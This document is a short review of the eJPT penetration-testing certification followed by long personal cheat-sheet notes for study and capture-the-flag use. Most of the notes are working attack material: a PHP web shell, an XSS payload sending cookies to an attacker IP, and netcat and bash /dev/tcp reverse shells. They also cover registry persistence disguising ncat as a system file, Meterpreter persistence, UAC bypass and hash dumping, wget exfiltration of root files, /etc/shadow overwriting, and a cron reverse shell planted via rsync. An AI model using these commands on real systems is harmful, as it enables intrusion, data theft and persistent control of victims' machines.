My Review
| Difficulty: ★☆☆☆☆ | |
| Price: ★★★★☆ | $249 |
| Material: ★★☆☆☆ | |
| Real-World Scenario: ★☆☆☆☆ | |
| Worth it?: Yes, as a first cert | |
| Official Site: eJPT by INE |
This is eJPTv1, So I reckon that the material got better after the update
If you have zero experience with Pentesting, start with TryHackMe. Learn the basics then you are good to go!
Gather information
on google:
site: <website>
DNSdumpster.com VirusTotal
ctr.sh <certificate search>
on kali:
sublist3r -d <domain>
subbrute
apt-get install snapd
service snapd start
snap install amass
snap run amass -ip -d <domain>
PORT SCAN
fping -a -g <host> 2>/dev/null
To get the ips that are UP, we can send to a file
Nmap can execute the scan with:
-iL <file>.
-sS - stealth scan
-sT - tcp scan > generates logs
-sV - get versions > not as stealth but very useful
-O - Try to get OS
-iL - get hosts by file
-Pn - assumes all hosts are ups and try to scan
-p - port
-A - More profound scan
We can go with:
-sV -T4 -p- then -sV -T4 -p <the ports> -A > nmap.result
VULNERABILITY SCAN
- OpenVAS
- Nexpose
- GFI LAN Guard
- Nessus
List of various vuln scans: https://sectools.org/tag/vuln-scanners/
Web Scan
MANUAL FINGERPRINT
nc <target> 80
HEAD / HTTP/1.0
<space>
<space>
For https use openssl:
openssl s_client -connect <target>:443
HEAD / HTTP/1.0
httprint -P0 -h <target> -s <signature file>
-P0 - to avoid pinging the host
-h - target hosts
HTTP VERBS PUT
to count in bytes how long your payload is:
wc -m payload.php
nc <target site> 80
PUT /payload.php hTTP/1.0
Content-Type: text/html
Content-lenght: 136 > value that we get with wc -m <payload>
<?php phpinfo(); ?>
PHP shell code: to use with PUT method:
<?php
if (isset($_GET['cmd']))
{
$cmd = $_GET['cmd'];
echo '<pre>';
$result = shell_exec($cmd);
echo $result;
echo '</pre>';
}
?>
After uploading this shell, we can go to the browser and use:
"?cmd=<command>"
NC
we can send files using netcat also: Receiver
nc -lvnp <port> > output_file.txt
Sender
echo 'hello' | nc -v <ip> <port>
or
cat <file_u_Wanna_send> | nc -v <ip> <port>
Bind Shell with netcat:
in the server/listener:
nc -lvnp <port> -e /bin/bash
in the client/sender:
nc -v <ip> <port>
Dictionary-based Enumeration
common backup file names are: .bak, .old, .txt and .xxx
DIRB
-x <file of extensions>
-X "extensions.bak, extensions.xxx"
-z delay in miliseconds
-o output a file
-p proxy
-H "set a header"
-u basic authentication "user:password"
-c "set a cookie"
-a "set a agent user"
XSS
reflective > can execute commands and get answer of output in the browser stored > can send files to the server / get cookies for others users and steal sessions
find a user input field:
# try to execute a html command like
<h1> teste </h1>
# try to execute JS command like
<script>alert('XSS');</script>
payload to steal cookies: XSS Stored we need to have a page to send the cookies, in this case we have get.php but in real scenario we gottta have a page set up to be able to do that.
<script>
var i = new Image();
i.src="http://192.168.99.11/get.php?cookies="+document.cookie;
</script>
after that, we go to the ip 99.11 and get the file with the stolen cookie.
MYSQL INJECTION
' or substr(user(), 1, 1) = 'a
' or substr(user(), 1, 1) = 'b
after finding the first letter
' or substr(user(), 2, 1) = 'a
-
go to the second one.
-
guessing the current user.
SQLMap
sqlmap -u <URL> -p <injection parameter> [options]
example:
sqlmap -u 'vulnerable url' -p id --technique=U #using UNION
with POST:
sqlmap -u 'url' --data <post string> -p parameter [options] # u can get the post string with burp
-b - banner
--tables
--current-db <name>
--columns
--dump
-v3 --fresh-queries # to see what payload the sqlmap used
--dbs # to see the databases availables
--users # to see the users
-D # set the database of your choice
-T # set the tables of your choice
-C # set column of your choice
-r # request, we can get from burp
--technique=U # UNION attack
--technique=B # boolean-based attacks
--flush-session # if you need to clear the logs for a rerun test or smt like that #logs > /usr/share/sqlmap/output/
System Atacks
ncat
-l -listem
-e -execute file
-p -port
-v -verbose
backdoor
- copy ncat (with the right OS version) to the target
- as WIndows\system32\winconfig.exe
- go to regedit
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
New > String Value Edit with the path of the ncat as winconfig follow by the ip of attacker and port to connect
-e cmd.exe
example: "C:\Windows\System32\winconfig.exe <IP> <PORT> -e cmd.exe"
# the persistence is set.
# We can listen in our attacker machine
ncat -l -p <port> -v
METERPRETER
if u have a session already
to get persistence:
use exploit/windows/local/s4u_persistence
or
use exploit/windows/local/persistence
set payload, session, lhost and port
set DisablePayloadHandler false
set start SYSTEM
then we are able to open a session even after the reboot with:
use exploit/multi/handler
set payload, lhost and port
with meterpreter we can:
- screenshot > to grab the screen of the target
# [in the attack machine]
eog /path of the screenshoot
download <file> or "/path"
upload <file> /path
sysinfo
ps #running proccess
whoami /priv
help #to see all commands
hashdump
search -f <file>
getuid #WINXP-ftp
getsystem >> this give us escalate privileges, now we are NT AUTHORITY\SYSTEM
getuid #AUTHORITY\SYSTEM
sysinfo
JOHN
bruteforce:
--list=formats #to see all formats available
after get the shadow and passwd files:
unshadow passwd shadow > crackme
john -incremental -users:victim crackme
john --show crackme #to see the result
dictionary:
john -w=/<wordlist> <file>
-rules #to add mangling example PASSWORD in the wordlist, mangling = password, passw0rd etc
rainbow tables:
- tools: ophcrack #its used only for Windows
HASHCAT
can use rules as well, to implement certain variations to the normal dictionaries; example:
password/p4ssw0rd/PAssWord!/123password etc
NETWORK ATTACKS
Hydra -l -p <target> <service>
-l - fixed user
-L - wordlist for user
-p - fixed password
-P - wordlist for passwords
hydra <IP> <type: http-post-form> "<directory-of-login-page>:<user=^USER^&pass=^PASS^:<message of invalid credentials>" -l <user> -p <pwd> -f {to exit when find a valid login} -V {verbose, to show us the result}
SHARES
Windows:
unumerate windows shares:
nbtstat
nbtstat -A <IP> # most common, display information about the target
output:
Name - Type - Status
xx - <00> is a workstation - Registered
xx - <20> sharing is up and running- Regustered
NET VIEW <target IP>
Linux:
nmblookup -A <target ip>
smbclient -L //<IP> -N
-L = #to look which services are available
-N #to force to not ask For password
Checking ‘for’ NULL Sessions with Windows:
net use \\<IP>\IPC$ '' /u: ''
Checking ‘for’ NULL Sessions with Linux
smbclient \\\\<IP>\\IPC$ -N
TOOLS
in Windows:
enum:
enum -S <IP> # enumerate shares
enum -U <IP> # enumerate users
enum -P <IP> # check password policy
winfo:
winfo <IP> -n
in Linux: enum4linux
samrdump <IP>
/usr/share/doc/python-impacket-doc/examples/
we can use nmap to enumerate the shares also:
nmap -script=smb-enum-shares <IP>
nmap -script=smb-enum-users <IP>
nmap -script=smb-brute <IP>
nmap --script smb-check-vulns.exe --script-args=unsafe=1 <IP>
[!NOTE] This checks if the machine is vulnerable against well known vulnerabilties
ARP
[!NOTE] its a protocol to resolve ip address into mac address
First we need to enable IP Forwarding:
By enabling IP Forwarding, you tell your machine to forward the packets you intercept to the real destination host.
echo 1 > /proc/sys/net/ipv4/ip_forward
You can then run arpspoof:
arpspoof -i <interface> -t <target> -r <host>
example:
arpspoof -i eth0 -t 192.168.4.11 -r 192.168.4.16
[!NOTE] You can then run Wireshark and intercept the traffic!
METERPRETER
Most used Payloads:
bind_tcp
- Runs a server process on the target machine that waits for connections from the attacker machine
reverse_tcp
- Performs a TCP connection back to the attacker machine. As you saw in the Backdoors chapter, this feature
- help evade firewall rules
We can use the getsystem to update our privilege, but in modern Windows that is not possible because of the User Account Control We can bypass that restriction by using the “bypassuac”
- search bypassuac
use exploit/windows/local/bypassuac set session <session that we want to update privileges>
in the new meterpreter session, the UAC is disabled, so we can execute the command “getsystem”
- hashdump to dump the password databases and save it ‘for’ an offline cracking session;
use post/windows/gather/hashdump
set session <session number>
We can ‘download’ and ‘upload’ files:
'shell' > to run standard operating system shell
run post/windows/gather/win_privs = whoami /priv
ps
We can migrate to a process to be more stealth:
ps -U SYSTEM or whatever our privileges is;
migrate < PID >
getpid to see if it worked.
hashdump # to hash the pwd and shadow, but only works if we have SYSTEM privilege.
get that and run john to crack
If we have a session already, we can upgrade to meterpreter session
by using:
post/multi/manage/shell_to_meterpreter
set session <number>
set lport and lhost
run
Remote Code Executions
echo $PATH
# visit some of these locations and view what tools are there
# is netcat present?
which nc
# is python present?
which python
# is curl installed?
which curl
# is wget installed?
which wget
we can use these tools do get shell.
with netcat:
nc <IP> <port> -e /bin/bash
and listening in our kali
nc -lvnp <port>
with CURL
In kali:
nc -lvnp <port>
In target:
curl http://<our IP>:<port>
curl http://<our IP>:<port>/'whoami'
curl http://<our IP>:<port>/'id | base64'
curl http://<our IP>:<port>/file -T /etc/issue
We can try to upload a msfvenom payload to the machine.
msfvenom -p linux/x64/shell_reverse_tcp lhost=
curl http://<our IP>:<por>/<file> -o /tmp/r
chmod +x /tmp/r
/tmp/r # run after netcat is listening
PrivEsc WgelCTF
user was able to use wget as SUDO…
1:
sudo wget --post-file /root/root.txt http://10.10.14.5:443/
I sent the flag through http.server
2:
Create shadow file
openssl passwd -1 -salt 0xdf password
sudo wget -O /etc/shadow http://10.10.14.5/shadow
su -
I did a file a shadow file and overwrote the actual shadow of the machine:
root:$1$0xdf$fKKvgEPPSu1HMdNI3w5i50:18195:0:99999:7:::
so when the command su - is written, I get root access.
root@CorpOne:~# id
uid=0(root) gid=0(root) groups=0(root)
Extra notes
| Service | User | Password | Notes |
|---|---|---|---|
| Wordpress | administrator |
Wordpress Appearance > theme-editor > select a theme that is not in use > 404 Template > edit your php file
<?php system($_REQUEST['cmd']); ?>
dominio/main/wp-content/themes/
bash -c 'bash -i >& /dev/tcp/<kali ip>/<port> 0>&1' # You can encode with burp before send
curl <ip:port>
COPY cat command
cat reverse-shell.php | xclip -selection clipboard
After open a python server to send a file:
grab with curl:
curl <ip:port>/linpeas.sh | bash or sh # this will execute directly
Better shell
{
python -c "import pty;pty.spawn('/bin/bash')"
crtl + z
stty raw -echo
fg
enter
enter
}
Discovery Web Content: dirb, gobuster, dirsearch
ffuf -u <url>/FUZZ -w <wordlist>
ffuf -u <url>/FUZZ-- -w <wordlist-special-chars> -mc 200,500 -fw 9
GOBUSTER - WEB ENUMERATION
try to find directories
gobuster dir -w /opt/Seclists/Discovery/Web-Content/raft-small-words.txt -x php -u <url> -o gobuster/dir-root.log
try to find subdomains
gobuster vhost -w /opt/Seclists/Discovery/DNS/subdomains-topmillion-110000.txt -u <url> -o gobuster/vhist-sub.txt
We can save the request of a login from burp/zap with copy to file. request.req
SQLMAP
sqlmap -r <login.req> --batch
sqlmap -r <login.req> --batch --level 5 --risk 3
GREP
cat <file> | grep -v <somethin> # show everything except lines with <something>
WITH LOGINS:
we can try to register 'admin<space>'
sometimes the site register the same username of 'admin' and when we try to login
we have admin privileges to the web server
cat /etc/passwd | grep sh$ | awk -F '{print 1$}' # print all the usernames that finish with sh
poetry run CrackMapExec ssh <url> -u <users file> -p <pwd file>
zcap can read gzip files like a cat:
zcap access.log.*.gz | grep -iv 'a\|b\|c'
AUREPORT
Can do a report upon the logs files.
example:
aureport --tty # to show terminals access
Pivot
In kali:
create a directory: /www
python3 -m http.server
nc -lvnp 8000 < {file we want to send}
In target:
curl <ip>:<port>/<file>
wget http://<ip>:<port>/file
cat < /dev/tcp/<kali ip>/<port> # to get the output of the file
bash -c "cat < /dev/tcp/<kali ip>/<port>" # if the shell isnt bash, try to execute as bash
bash -c "cat < /dev/tcp/<kali ip>/<port> > /dev/shm/LinEnum.sh" # try to send to a file
bash -c "bash -i >& /dev/tcp/<kali ip>/<port> 0>&1" # to get reverse shell
- It works like fping -a -g - but sometimes the target does not have this option
for ip in $(seq 1 5); do ping -c 1 < x.x.x.$ip > /dev/null && echo "Online: x.x.x.$ip"; done - nmap inside machine without nmap
for port in $(seq 1 65535); do (echo scan > /dev/tcp/<target ip>/$port && echo "Open: $port") 2>/dev/null; done
PIVOT with CHISEL
IN Kali:
chisel server -p 8000 -reverse -v
after the handshake with the chisel server:
curl localhost:8001
In Target:
chisel client <kali ip>:8000 R:8001:<target ip>:80
# This will open port 8001 of our kali to send data through the tunneling network to port 80 of the target
chisel client <kali ip>:8000 R:8001:127.0.0.1:<target ip>:80
# Its a bit more secure, cause we only can access though the localhost
chisel client <kali ip>:8000 R:127.0.0.1:6379:<target ip>:6379
# We can access the 6379 port of the target in our machine by localhost:<port we just opened>
nmap -sT -p <port> -sC -sV localhost -oA nmap/name-u-want
We can visualize the open port with netstat:
netstat -alnp | grep 8001
LOCAL PIVOT
In Kali:
chisel server -p 8000
In target:
chisel client <kali ip>:<port> 9001:127.0.0.1:8001
# this open the 9001 of the target and tunnel with our 8001 port
chisel client <kali ip>:<port> 9001:1< another target ip >:445
# to open a windows box through tunneling
telnet or nc localhost <port>
flushall
set AnyText "<? system($_REQUEST['cmd']); ?>"
config set dbfilename shell.php
config set dir /var/www/html/
Then we can open in the browser ip/shell.php?cmd=<command>
# problably what we want is a reverse shell
# so we cam grab in pentest monkey
Do a CRONJOB in target:
echo "* * * * * root bash -c 'bash -i >& /dev/tcp/<kali ip>/<port> 0>&1'" > runme
send with rsync:
rsync -a runme rsync://backup:873/src/etc/cron.d/runme
We can send commands base64 encoded, if the shell of the target machine is not accepting out request;
bash -c 'bash -i >& /dev/tcp/<kali ip>/<port> 0>&1' | base64
get the output:
echo "* * * * * root bash -c 'output in base64 | base64 -d" > runme
REVERSE SOCKS
In Kali:
chisel server -p 8000 -reverse -v
In Target:
chisel client <kali ip>:8000 R:8001:127.0.0.1:1337
chisel server -p 1337 --socks5
Will redirect everything from our port 8001 to port 1337 of the target
In Kali again:
chisel client 127.0.0.1:8001 socks